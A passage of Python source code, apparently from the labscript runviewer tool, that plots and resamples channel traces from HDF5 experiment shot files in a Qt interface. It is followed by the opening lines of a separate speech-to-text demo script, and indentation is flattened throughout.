checked = item.checkState()
row = self.shot_model.indexFromItem(item).row()
colour_item = self.shot_model.item(row, SHOT_MODEL__COLOUR_INDEX)
check_shutter = self.shot_model.item(row, SHOT_MODEL__SHUTTER_INDEX)
if checked:
colour = colour_item.data(Qt.UserRole)
if colour is not None:
colour = colour()
else:
colour = self.shot_colour_delegate.get_next_colour()
colour_item.setEditable(True)
pixmap = QPixmap(20, 20)
pixmap.fill(colour)
icon = QIcon(pixmap)
colour_item.setData(lambda clist=self.shot_colour_delegate._colours, colour=colour: int_to_enum(clist, colour), Qt.UserRole)
colour_item.setData(icon, Qt.DecorationRole)
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(item.data().path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(True)
if self.ui.markers_comboBox.currentIndex() == 0:
self.ui.markers_comboBox.setCurrentIndex(shot_combobox_index)
if item.data().shutter_times != {}:
check_shutter.setEnabled(True)
else:
check_shutter.setEnabled(False)
check_shutter.setToolTip("This shot doesn't contain shutter markers")
else:
# colour = None
# icon = None
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(item.data().path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(False)
if shot_combobox_index == self.ui.markers_comboBox.currentIndex():
self.ui.markers_comboBox.setCurrentIndex(0)
colour_item.setEditable(False)
check_shutter.setEnabled(False)
# model.setData(index, editor.itemIcon(editor.currentIndex()),
# model.setData(index, editor.itemData(editor.currentIndex()), Qt.UserRole)
self.update_channels_treeview()
elif self.shot_model.indexFromItem(item).column() == SHOT_MODEL__COLOUR_INDEX:
# update the plot colours
# get reference to the changed shot
current_shot = self.shot_model.item(self.shot_model.indexFromItem(item).row(), SHOT_MODEL__CHECKBOX_INDEX).data()
# find and update the pen of the plot items
for channel in self.plot_items.keys():
for shot in self.plot_items[channel]:
if shot == current_shot:
colour = item.data(Qt.UserRole)
self.plot_items[channel][shot].setPen(pg.mkPen(QColor(colour()), width=2))
elif self.shot_model.indexFromItem(item).column() == SHOT_MODEL__SHUTTER_INDEX:
current_shot = self.shot_model.item(self.shot_model.indexFromItem(item).row(), SHOT_MODEL__CHECKBOX_INDEX).data()
self.on_toggle_shutter(item.checkState(), current_shot)
def load_shot(self, filepath):
shot = Shot(filepath)
# add shot to shot list
# Create Items
items = []
colour_item = QStandardItem('')
colour_item.setEditable(False)
colour_item.setToolTip('Double-click to change colour')
items.append(colour_item)
check_shutter = QStandardItem()
check_shutter.setCheckable(True)
check_shutter.setCheckState(Qt.Unchecked) # options are Qt.Checked OR Qt.Unchecked
check_shutter.setEnabled(False)
check_shutter.setToolTip("Toggle shutter markers")
items.append(check_shutter)
check_item = QStandardItem(shot.path)
check_item.setEditable(False)
check_item.setCheckable(True)
check_item.setCheckState(Qt.Unchecked) # options are Qt.Checked OR Qt.Unchecked
check_item.setData(shot)
check_item.setToolTip(filepath)
items.append(check_item)
# script name
# path_item = QStandardItem(shot.path)
# path_item.setEditable(False)
# items.append(path_item)
self.shot_model.appendRow(items)
self.ui.markers_comboBox.addItem(os.path.basename(shot.path), shot)
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(shot.path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(False)
# only do this if we are checking the shot we are adding
# self.update_channels_treeview()
def get_selected_shots_and_colours(self):
# get the ticked shots
ticked_shots = {}
for i in range(self.shot_model.rowCount()):
item = self.shot_model.item(i, SHOT_MODEL__CHECKBOX_INDEX)
colour_item = self.shot_model.item(i, SHOT_MODEL__COLOUR_INDEX)
shutter_item = self.shot_model.item(i, SHOT_MODEL__SHUTTER_INDEX)
if item.checkState() == Qt.Checked:
shot = item.data()
colour_item_data = colour_item.data(Qt.UserRole)
ticked_shots[shot] = (colour_item_data(), shutter_item.checkState())
return ticked_shots
def update_channels_treeview(self):
ticked_shots = self.get_selected_shots_and_colours()
# get set of channels
channels = {}
for shot in ticked_shots.keys():
channels[shot] = set(shot.channels)
channels_set = frozenset().union(*channels.values())
# now find channels in channels_set which are not in the treeview, and add them
# now find channels in channels set which are already in the treeview, but deactivated, and activate them
treeview_channels_dict = {}
deactivated_treeview_channels_dict = {}
for i in range(self.channel_model.rowCount()):
item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
# Sanity check
if str(item.text()) in treeview_channels_dict:
raise RuntimeError("A duplicate channel name was detected in the treeview due to an internal error. Please lodge a bugreport detailing how the channels with the same name appeared in the channel treeview. Please restart the application")
treeview_channels_dict[str(item.text())] = i
if not item.isEnabled():
deactivated_treeview_channels_dict[str(item.text())] = i
treeview_channels = set(treeview_channels_dict.keys())
deactivated_treeview_channels = set(deactivated_treeview_channels_dict.keys())
# speed up working with self.channel_model by blocking signals and later reenabeling them
self.channel_model.blockSignals(True)
# find list of channels to work with
channels_to_add = channels_set.difference(treeview_channels)
for channel in sorted(channels_to_add):
items = []
check_item = QStandardItem(channel)
check_item.setEditable(False)
check_item.setCheckable(True)
check_item.setCheckState(Qt.Unchecked)
items.append(check_item)
# channel_name_item = QStandardItem(channel)
# channel_name_item.setEditable(False)
# items.append(channel_name_item)
self.channel_model.appendRow(items)
channels_to_reactivate = deactivated_treeview_channels.intersection(channels_set)
for channel in channels_to_reactivate:
for i in range(self.channel_model.columnCount()):
item = self.channel_model.item(deactivated_treeview_channels_dict[channel], i)
item.setEnabled(True)
item.setSelectable(True)
# now find channels in the treeview which are not in the channels_set and deactivate them
channels_to_deactivate = treeview_channels.difference(channels_set)
for channel in channels_to_deactivate:
for i in range(self.channel_model.columnCount()):
item = self.channel_model.item(treeview_channels_dict[channel], i)
item.setEnabled(False)
item.setSelectable(False)
self.channel_model.blockSignals(False)
self.channel_model.layoutChanged.emit()
# TODO: Also update entries in groups
self.update_plots()
def update_plots(self):
# get list of selected shots
ticked_shots = self.get_selected_shots_and_colours()
# SHould we rescale the x-axis?
# if self._hidden_plot[0].getViewBox.getState()['autoRange'][0]:
# self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis)
# else:
# self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis, enable=False)
# find stop time of longest ticked shot
largest_stop_time = 0
stop_time_set = False
for shot in ticked_shots.keys():
if shot.stop_time > largest_stop_time:
largest_stop_time = shot.stop_time
stop_time_set = True
if not stop_time_set:
largest_stop_time = 1.0
# Update the range of the link plot
self._hidden_plot[1].setData([0, largest_stop_time], [0, 1e-9])
# Update plots
for i in range(self.channel_model.rowCount()):
check_item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
channel = str(check_item.text())
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
# we want to show this plot
# does a plot already exist? If yes, show it
if channel in self.plot_widgets:
self.plot_widgets[channel].show()
# update the plot
# are there are plot items for this channel which are shown that should not be?
to_delete = []
for shot in self.plot_items[channel]:
if shot not in ticked_shots.keys():
self.plot_widgets[channel].removeItem(self.plot_items[channel][shot])
# Remove Shutter Markers of unticked Shots
if shot in self.shutter_lines[channel]:
for line in self.shutter_lines[channel][shot][0]:
self.plot_widgets[channel].removeItem(line)
for line in self.shutter_lines[channel][shot][1]:
self.plot_widgets[channel].removeItem(line)
self.shutter_lines[channel].pop(shot)
to_delete.append(shot)
for shot in to_delete:
del self.plot_items[channel][shot]
# do we need to add any plot items for shots that were not previously selected?
for shot, (colour, shutters_checked) in ticked_shots.items():
if shot not in self.plot_items[channel]:
# plot_item = self.plot_widgets[channel].plot(shot.traces[channel][0], shot.traces[channel][1], pen=pg.mkPen(QColor(colour), width=2))
# Add empty plot as it the custom resampling we do will happen quicker if we don't attempt to first plot all of the data
plot_item = self.plot_widgets[channel].plot([0, 0], [0], pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
self.plot_items[channel][shot] = plot_item
# Add Shutter Markers of newly ticked Shots
self.add_shutter_markers(shot, channel, shutters_checked)
for t, m in self.all_markers.items():
color = m['color']
color = QColor(color[0], color[1], color[2])
if self.scale_time and self.scalehandler is not None:
t = self.scalehandler.get_scaled_time(t)
line = self.plot_widgets[channel].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine))
self.all_marker_items[line] = self.plot_widgets[channel]
# If no, create one
else:
self.create_plot(channel, ticked_shots)
else:
if channel not in self.plot_widgets:
self.create_plot(channel, ticked_shots)
self.plot_widgets[channel].hide()
self._resample = True
def create_plot(self, channel, ticked_shots):
self.plot_widgets[channel] = pg.PlotWidget() # name=channel)
self.plot_widgets[channel].setMinimumHeight(200)
self.plot_widgets[channel].setMaximumHeight(200)
self.plot_widgets[channel].setLabel('bottom', 'Time', units='s')
self.plot_widgets[channel].showAxis('right', True)
self.plot_widgets[channel].showAxis('bottom', True)
self.plot_widgets[channel].setXLink('runviewer - time axis link')
self.plot_widgets[channel].sigXRangeChanged.connect(self.on_x_range_changed)
self.plot_widgets[channel].scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, self.plot_widgets[channel], channel))
self.ui.plot_layout.insertWidget(self.ui.plot_layout.count() - 1, self.plot_widgets[channel])
self.shutter_lines[channel] = {} # initialize Storage for shutter lines
self.plot_items.setdefault(channel, {})
has_units = False
units = ''
for shot, (colour, shutters_checked) in ticked_shots.items():
if channel in shot.traces:
# plot_item = self.plot_widgets[channel].plot(shot.traces[channel][0], shot.traces[channel][1], pen=pg.mkPen(QColor(colour), width=2))
# Add empty plot as it the custom resampling we do will happen quicker if we don't attempt to first plot all of the data
plot_item = self.plot_widgets[channel].plot([0, 0], [0], pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
self.plot_items[channel][shot] = plot_item
if len(shot.traces[channel]) == 3:
has_units = True
units = shot.traces[channel][2]
# Add Shutter Markers of ticked Shots
self.add_shutter_markers(shot, channel, shutters_checked)
if has_units:
self.plot_widgets[channel].setLabel('left', channel, units=units)
else:
self.plot_widgets[channel].setLabel('left', channel)
def add_shutter_markers(self, shot, channel, shutters_checked):
if shot not in self.shutter_lines[channel] and channel in shot.shutter_times:
self.shutter_lines[channel][shot] = [[], []]
open_color = QColor(0, 255, 0)
close_color = QColor(255, 0, 0)
for t, val in shot.shutter_times[channel].items():
scaled_t = t
if val: # val != 0, shutter open
line = self.plot_widgets[channel].addLine(x=scaled_t, pen=pg.mkPen(color=open_color, width=4., style=Qt.DotLine))
self.shutter_lines[channel][shot][1].append(line)
if not shutters_checked:
line.hide()
else: # else shutter close
line = self.plot_widgets[channel].addLine(x=scaled_t, pen=pg.mkPen(color=close_color, width=4., style=Qt.DotLine))
self.shutter_lines[channel][shot][0].append(line)
if not shutters_checked:
line.hide()
def on_x_range_changed(self, *args):
# print 'x range changed'
self._resample = True
@inmain_decorator(wait_for_return=True)
def _get_resample_params(self, channel, shot):
rect = self.plot_items[channel][shot].getViewBox().viewRect()
xmin, xmax = rect.left(), rect.width() + rect.left()
dx = xmax - xmin
view_range = self.plot_widgets[channel].viewRange()
return view_range[0][0], view_range[0][1], dx
def resample(self, data_x, data_y, xmin, xmax, stop_time, num_pixels):
"""This is a function for downsampling the data before plotting
it. Unlike using nearest neighbour interpolation, this method
preserves the features of the plot. It chooses what value to
use based on what values within a region are most different
from the values it's already chosen. This way, spikes of a short
duration won't just be skipped over as they would with any sort
of interpolation."""
# TODO: Only finely sample the currently visible region. Coarsely sample the rest
# x_out = numpy.float32(numpy.linspace(data_x[0], data_x[-1], 4000*(data_x[-1]-data_x[0])/(xmax-xmin)))
x_out = numpy.float64(numpy.linspace(xmin, xmax, 3 * 2000 + 2))
y_out = numpy.empty(len(x_out) - 1, dtype=numpy.float64)
data_x = numpy.float64(data_x)
data_y = numpy.float64(data_y)
# TODO: investigate only resampling when necessary.
# Currently pyqtgraph sometimes has trouble rendering things
# if you don't resample. If a point is far off the graph,
# and this point is the first that should be drawn for stepMode,
# because there is a long gap before the next point (which is
# visible) then there is a problem.
# Also need to explicitly handle cases where none of the data
# is visible (which resampling does by setting NaNs)
#
# x_data_slice = data_x[(data_x>=xmin)&(data_x<=xmax)]
# print len(data_x)
# if len(x_data_slice) < 3*2000+2:
# x_out = x_data_slice
# y_out = data_y[(data_x>=xmin)&(data_x<=xmax)][:-1]
# logger.info('skipping resampling')
# else:
resampling = True
if resampling:
_resample(data_x, data_y, x_out, y_out, numpy.float64(stop_time))
# self.__resample4(data_x, data_y, x_out, y_out, numpy.float32(stop_time))
else:
x_out, y_out = data_x, data_y
return x_out, y_out
def __resample4(self, x_in, y_in, x_out, y_out, stop_time):
# we want x-out to have three times the number of points as there are pixels
# Plus one at the end
# y_out = numpy.empty(len(x_out)-1, dtype=numpy.float64)
# print 'len x_out: %d'%len(x_out)
# A couple of special cases that I don't want to have to put extra checks in for:
if x_out[-1] < x_in[0] or x_out[0] > stop_time:
# We're all the way to the left of the data or all the way to the right. Fill with NaNs:
y_out.fill('NaN')
elif x_out[0] > x_in[-1]:
# We're after the final clock tick, but before stop_time
i = 0
while i < len(x_out) - 1:
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
else:
i = 0
j = 1
# Until we get to the data, fill the output array with NaNs (which
# get ignored when plotted)
while x_out[i] < x_in[0]:
y_out[i] = numpy.float('NaN')
y_out[i + 1] = numpy.float('NaN')
y_out[i + 2] = numpy.float('NaN')
i += 3
# If we're some way into the data, we need to skip ahead to where
# we want to get the first datapoint from:
while x_in[j] < x_out[i]:
j += 1
# Get the first datapoint:
# y_out[i] = y_in[j-1]
# i += 1
# Get values until we get to the end of the data:
while j < len(x_in) and i < len(x_out) - 2: # Leave one spare for the final data point and one because stepMode=True requires len(y)=len(x)-1
# This is 'nearest neighbour on the left' interpolation. It's
# what we want if none of the source values checked in the
# upcoming loop are used:
y_out[i] = y_in[j - 1]
i += 2
positive_jump_value = 0
positive_jump_index = j - 1
negative_jump_value = 0
negative_jump_index = j - 1
# now find the max and min values between this x_out time point and the next x_out timepoint
# print i
while j < len(x_in) and x_in[j] < x_out[i]:
jump = y_in[j] - y_out[i - 2]
# would using this source value cause a bigger positive jump?
if jump > 0 and jump > positive_jump_value:
positive_jump_value = jump
positive_jump_index = j
# would using this source value cause a bigger negative jump?
elif jump < 0 and jump < negative_jump_value:
negative_jump_value = jump
negative_jump_index = j
j += 1
if positive_jump_index < negative_jump_index:
y_out[i - 1] = y_in[positive_jump_index]
y_out[i] = y_in[negative_jump_index]
# TODO: We could override the x_out values with x_in[jump_index]
else:
y_out[i - 1] = y_in[negative_jump_index]
y_out[i] = y_in[positive_jump_index]
i += 1
# Get the last datapoint:
if j < len(x_in):
# If the sample rate of the raw data is low, then the current
# j point could be outside the current plot view range
# If so, decrease j so that we take a value that is within the
# plot view range.
if x_in[j] > x_out[-1] and j > 0:
j -= 1
y_out[i] = y_in[j]
i += 1
# if i < len(x_out):
# y_out[i] = y_in[-1]
# i += 1
# Fill the remainder of the array with the last datapoint,
# if t < stop_time, and then NaNs after that:
while i < len(x_out) - 1:
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
# return y_out # method changed to modify y_out array in place
def __resample3(self, x_in, y_in, x_out, stop_time):
"""This is a Python implementation of the C extension. For
debugging and developing the C extension."""
y_out = numpy.empty(len(x_out))
i = 0
j = 1
# A couple of special cases that I don't want to have to put extra checks in for:
if x_out[-1] < x_in[0] or x_out[0] > stop_time:
# We're all the way to the left of the data or all the way to the right. Fill with NaNs:
while i < len(x_out):
y_out[i] = numpy.float('NaN')
i += 1
elif x_out[0] > x_in[-1]:
# We're after the final clock tick, but before stop_time
while i < len(x_out):
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
else:
# Until we get to the data, fill the output array with NaNs (which
# get ignored when plotted)
while x_out[i] < x_in[0]:
y_out[i] = numpy.float('NaN')
i += 1
# If we're some way into the data, we need to skip ahead to where
# we want to get the first datapoint from:
while x_in[j] < x_out[i]:
j += 1
# Get the first datapoint:
y_out[i] = y_in[j - 1]
i += 1
# Get values until we get to the end of the data:
while j < len(x_in) and i < len(x_out):
# This is 'nearest neighbour on the left' interpolation. It's
# what we want if none of the source values checked in the
# upcoming loop are used:
y_out[i] = y_in[j - 1]
while j < len(x_in) and x_in[j] < x_out[i]:
# Would using this source value cause the interpolated values
# to make a bigger jump?
if numpy.abs(y_in[j] - y_out[i - 1]) > numpy.abs(y_out[i] - y_out[i - 1]):
# If so, use this source value:
y_out[i] = y_in[j]
j += 1
i += 1
# Get the last datapoint:
if i < len(x_out):
y_out[i] = y_in[-1]
i += 1
# Fill the remainder of the array with the last datapoint,
# if t < stop_time, and then NaNs after that:
while i < len(x_out):
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
return y_out
def _resample_thread(self):
logger = logging.getLogger('runviewer.resample_thread')
while True:
if self._resample:
self._resample = False
# print 'resampling'
ticked_shots = inmain(self.get_selected_shots_and_colours)
for shot, (colour, shutters_checked) in ticked_shots.items():
for channel in shot.traces:
if self.channel_checked_and_enabled(channel):
try:
xmin, xmax, dx = self._get_resample_params(channel, shot)
# We go a bit outside the visible range so that scrolling
# doesn't immediately go off the edge of the data, and the
# next resampling might have time to fill in more data before
# the user sees any empty space.
if self.scale_time:
xnew, ynew = self.resample(shot.scaled_times(channel), shot.traces[channel][1], xmin, xmax, shot.stop_time, dx)
else:
xnew, ynew = self.resample(shot.traces[channel][0], shot.traces[channel][1], xmin, xmax, shot.stop_time, dx)
inmain(self.plot_items[channel][shot].setData, xnew, ynew, pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
except Exception:
#self._resample = True
pass
else:
logger.info('ignoring channel %s' % channel)
time.sleep(0.5)
@inmain_decorator(wait_for_return=True)
def channel_checked_and_enabled(self, channel):
logger.info('is channel %s enabled' % channel)
index = self.channel_model.index(0, CHANNEL_MODEL__CHANNEL_INDEX)
indexes = self.channel_model.match(index, Qt.DisplayRole, channel, 1, Qt.MatchExactly)
logger.info('number of matches %d' % len(indexes))
if len(indexes) == 1:
check_item = self.channel_model.itemFromIndex(indexes[0])
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
return True
return False
def on_x_axis_reset(self):
self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis)
def on_y_axes_reset(self):
for plot_widget in self.plot_widgets.values():
plot_widget.enableAutoRange(axis=pg.ViewBox.YAxis)
def _enable_selected_shots(self):
self.update_ticks_of_selected_shots(Qt.Checked)
def _disable_selected_shots(self):
self.update_ticks_of_selected_shots(Qt.Unchecked)
def update_ticks_of_selected_shots(self, state):
# Get the selection model from the treeview
selection_model = self.ui.shot_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# for each row selected
for row in selected_row_list:
check_item = self.shot_model.item(row, SHOT_MODEL__CHECKBOX_INDEX)
check_item.setCheckState(state)
def _move_up(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row - 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row - 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
self.update_plot_positions()
def _move_down(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self.channel_model.rowCount() - 1 and (row + 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row + 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
self.update_plot_positions()
def _move_top(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row - 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row - 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
self.update_plot_positions()
def _move_bottom(self):
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self.channel_model.rowCount() - 1 and (row + 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row + 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
self.update_plot_positions()
def update_plot_positions(self):
# remove all widgets
layout_items = {}
for i in range(self.ui.plot_layout.count()):
if i == 0:
continue
item = self.ui.plot_layout.takeAt(i)
# add all widgets
for i in range(self.channel_model.rowCount()):
check_item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
channel = str(check_item.text())
if channel in self.plot_widgets:
self.ui.plot_layout.addWidget(self.plot_widgets[channel])
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
self.plot_widgets[channel].show()
else:
self.plot_widgets[channel].hide()
self.ui.plot_layout.addWidget(self._time_axis_plot[0])
class Shot(object):
def __init__(self, path):
self.path = path
# Store list of traces
self._traces = None
# store list of channels
self._channels = None
# store list of markers
self._markers = None
self.cached_scaler = None
self._scalehandler = None
self._scaled_x = {}
# store list of shutter changes and callibrations
self._shutter_times = None
self._shutter_calibrations = {}
# TODO: Get this dynamically
device_list = ['PulseBlaster', 'NI_PCIe_6363', 'NI_PCI_6733']
# Load connection table
self.connection_table = ConnectionTable(path)
# open h5 file
with h5py.File(path, 'r') as file:
# Get master pseudoclock
self.master_pseudoclock_name = file['connection table'].attrs['master_pseudoclock']
if isinstance(self.master_pseudoclock_name, bytes):
self.master_pseudoclock_name = self.master_pseudoclock_name.decode('utf8')
else:
self.master_pseudoclock_name = str(self.master_pseudoclock_name)
# get stop time
self.stop_time = file['devices'][self.master_pseudoclock_name].attrs['stop_time']
self.device_names = list(file['devices'].keys())
# Get Shutter Calibrations
if 'calibrations' in file and 'Shutter' in file['calibrations']:
for name, open_delay, close_delay in numpy.array(file['calibrations']['Shutter']):
self._shutter_calibrations[name] = [open_delay, close_delay]
def delete_cache(self):
self._channels = None
self._traces = None
def _load(self):
if self._channels is None:
self._channels = {}
if self._traces is None:
self._traces = {}
if self._markers is None:
self._markers = {}
if self._shutter_times is None:
self._shutter_times = {}
self._load_markers()
# Let's walk the connection table, starting with the master pseudoclock
master_pseudoclock_device = self.connection_table.find_by_name(self.master_pseudoclock_name)
self._load_device(master_pseudoclock_device)
self._scalehandler = ScaleHandler(self._markers.keys(), self.stop_time)
def _load_markers(self):
with h5py.File(self.path, 'r') as file:
if "time_markers" in file:
for row in file["time_markers"]:
self._markers[row['time']] = {'color': row['color'].tolist()[0], 'label': row['label']}
elif "runviewer" in file:
for time, val in file["runviewer"]["markers"].attrs.items():
props = val.strip('{}}').rsplit(",", 1)
color = list(map(int, props[0].split(":")[1].strip(" ()").split(",")))
label = props[1].split(":")[1]
self._markers[float(time)] = {'color': color, 'label': label}
def add_trace(self, name, trace, parent_device_name, connection):
name = str(name)
self._channels[name] = {'device_name': parent_device_name, 'port': connection}
self._traces[name] = trace
# add shutter times
try:
con = self.connection_table.find_by_name(name)
if con.device_class == "Shutter":
self.add_shutter_times([(name, con.properties['open_state'])])
except KeyError:
pass
# Temporary solution to physical shutter times
def add_shutter_times(self, shutters):
for name, open_state in shutters:
x_values, y_values = self._traces[name]
if len(x_values) > 0:
change_indices = numpy.where(y_values[:-1] != y_values[1:])[0]
change_indices += 1 # use the index of the value that is changed to
change_values = zip(x_values[change_indices], y_values[change_indices])
change_values.insert(0, (x_values[0], y_values[0])) # insert first value
self._shutter_times[name] = {x_value + (self._shutter_calibrations[name][0] if y_value == open_state else self._shutter_calibrations[name][1]): 1 if y_value == open_state else 0 for x_value, y_value in change_values}
def _load_device(self, device, clock=None):
try:
print('loading %s' % device.name)
module = device.device_class
# Load the master pseudoclock class
# labscript_devices.import_device(module)
device_class = labscript_devices.get_runviewer_parser(module)
device_instance = device_class(self.path, device)
clocklines_and_triggers = device_instance.get_traces(self.add_trace, clock)
for name, trace in clocklines_and_triggers.items():
child_device = self.connection_table.find_by_name(name)
for grandchild_device_name, grandchild_device in child_device.child_list.items():
self._load_device(grandchild_device, trace)
except Exception:
# TODO: print/log exception traceback
# if device.name == 'ni_card_0' or device.name == 'pulseblaster_0' or device.name == 'pineblaster_0' or device.name == 'ni_card_1' or device.name == 'novatechdds9m_0':
# raise
# raise
if hasattr(device, 'name'):
print('Failed to load device %s' % device.name)
else:
print('Failed to load device (unknown name, device object does not have attribute name)')
# backwards compat
with h5py.File(self.path, 'r') as file:
if "runviewer" in file:
if "shutter_times" in file["runviewer"]:
for name, val in file["runviewer"]["shutter_times"].attrs.items():
self._shutter_times[name] = {float(key_value.split(":")[0]): int(key_value.split(":")[1]) for key_value in val.strip('{}}').split(",")}
def scaled_times(self, channel):
if self.cached_scaler != app.scalehandler:
self.cached_scaler = app.scalehandler
self._scaled_x = {}
if channel not in self._scaled_x:
self._scaled_x[channel] = self.cached_scaler.get_scaled_time(self._traces[channel][0])
return self._scaled_x[channel]
@property
def channels(self):
if self._channels is None:
self._load()
return self._channels.keys()
def clear_cache(self):
# clear cache variables to cut down on memory usage
pass
@property
def markers(self):
if self._markers is None:
self._load()
return self._markers
@property
def traces(self):
# if traces cached:
# return cached traces and waits
if self._traces is None:
self._load()
return self._traces
@property
def shutter_times(self):
if self._shutter_times is None:
self._load()
return self._shutter_times
@property
def scalehandler(self):
if self._scalehandler is None:
self._load()
return self._scalehandler
class TempShot(Shot):
def __init__(self, i):
Shot.__init__(self, 'shot %d' % i)
self._channels = ['Bx', 'By', 'Bz', 'Bq']
self.stop_time = i + 1
self.traces = {}
no_x_points = 10000
for channel in self.channels:
# self.traces[channel] = (numpy.linspace(0,10,no_x_points), numpy.random.rand(no_x_points))
x_points = numpy.linspace(0, self.stop_time, no_x_points)
self.traces[channel] = (x_points, (i + 1) * numpy.sin(x_points * numpy.pi + i / 11.0 * 2 * numpy.pi))
@property
def channels(self):
return self._channels
def get_traces(self):
return self.traces
class RunviewerServer(ZMQServer):
def __init__(self, *args, **kwargs):
ZMQServer.__init__(self, *args, **kwargs)
self.logger = logging.getLogger('runviewer.server')
def handler(self, h5_filepath):
if h5_filepath == 'hello':
return 'hello'
self.logger.info('Received hdf5 file: %s' % h5_filepath)
# Convert path to local slashes and shared drive prefix:
h5_filepath = labscript_utils.shared_drive.path_to_local(h5_filepath)
logger.info('local filepath: %s' % h5_filepath)
# we add the shot to a queue so that we don't have to wait for the app to come up before
# responding to runmanager
shots_to_process_queue.put(h5_filepath)
return 'ok'
if __name__ == "__main__":
qapplication = QApplication(sys.argv)
shots_to_process_queue = Queue()
exp_config = LabConfig(required_params = {"DEFAULT": ["experiment_name"], "paths": ["shared_drive", "experiment_shot_storage"], 'ports': ['runviewer']})
port = int(exp_config.get('ports', 'runviewer'))
myappid = 'monashbec.runviewer' # arbitrary string
try:
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
except:
logger.info('Not on a windows machine')
# Start experiment server
experiment_server = RunviewerServer(port)
app = RunViewer(exp_config)
def execute_program():
qapplication.exec_()
sys.exit(execute_program())
|
Speech_demo.py
|
"""
https://cloud.ibm.com/docs/speech-to-text?topic=speech-to-text-websockets#websockets
Speech samples
https://upload.wikimedia.org/wikipedia/commons/d/d4/Samuel_George_Lewis.ogg
https://raw.githubusercontent.com/Azure-Samples/cognitive-services-speech-sdk/f9807b1079f3a85f07cbb6d762c6b5449d536027/samples/cpp/windows/console/samples/whatstheweatherlike.wav
https://www.signalogic.com/index.pl?page=speech_codec_wav_samples
http://www.voiptroubleshooter.com/open_speech/american/OSR_us_000_0010_8k.wav - american
http://www.voiptroubleshooter.com/open_speech/american/OSR_us_000_0030_8k.wav - american
http://www.voiptroubleshooter.com/open_speech/british/OSR_uk_000_0020_8k.wav - british
http://www.voiptroubleshooter.com/open_speech/french/OSR_fr_000_0041_8k.wav - french
"""
import os
import requests
import sys
from flask import Flask, request, render_template, jsonify, abort
import uuid
import json
from ibm_watson import IAMTokenManager
import threading
from threading import Thread
import websocket
"""
For debugging
"""
def print_environment_variables():
print('Environment Variables:')
